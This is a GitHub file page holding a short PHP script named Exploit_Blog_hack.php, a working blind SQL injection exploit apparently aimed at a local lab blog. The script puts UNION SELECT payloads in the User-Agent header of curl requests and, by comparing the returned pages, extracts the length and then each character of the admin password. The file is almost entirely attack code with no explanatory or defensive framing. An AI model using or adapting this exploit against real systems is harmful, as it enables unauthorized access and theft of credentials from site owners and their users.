-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathExploit_Blog_hack.php
64 lines (51 loc) · 1.45 KB
/
Exploit_Blog_hack.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<?php
set_time_limit(0);
header("Content-type: text/plain");
//========== - Const - ==============================
define('WEBSITE', 'http://192.168.0.134/blog_hack/');
$length = findPasswordLength();
$pass = findPassword($length);
function findPasswordLength() {
$i = 0;
while (true) {
$i++;
$payload = "' UNION SELECT 1,1,1 FROM user WHERE login = 'admin' AND LENGTH(password) = $i #";
if(ok(callPage($payload))) {
return $i;
}
}
}
function findPassword($length) {
$letters = str_split("1234567890abcdefghijklmnopqrstuvwxyz");
$result = "";
echo "Password: "; flush(); ob_flush();
for($i = 1; $i <= $length; ++$i) {
foreach($letters as $letter) {
$payload = "' UNION SELECT 1,1,1 FROM user WHERE login = 'admin' AND SUBSTRING(password, $i, 1) = '$letter' #";
if(ok(callPage($payload))) {
echo $letter; flush(); ob_flush();
break;
}
}
}
return $result;
}
function ok($page) {
if(stripos($page, "Utilisation d'un navigateur non support") !== false) {
return false;
}
else {
return true;
}
}
//Return the code page
function callPage($payload) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, WEBSITE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_USERAGENT, $payload);
$page = curl_exec($ch);
curl_close($ch);
return $page;
}
?>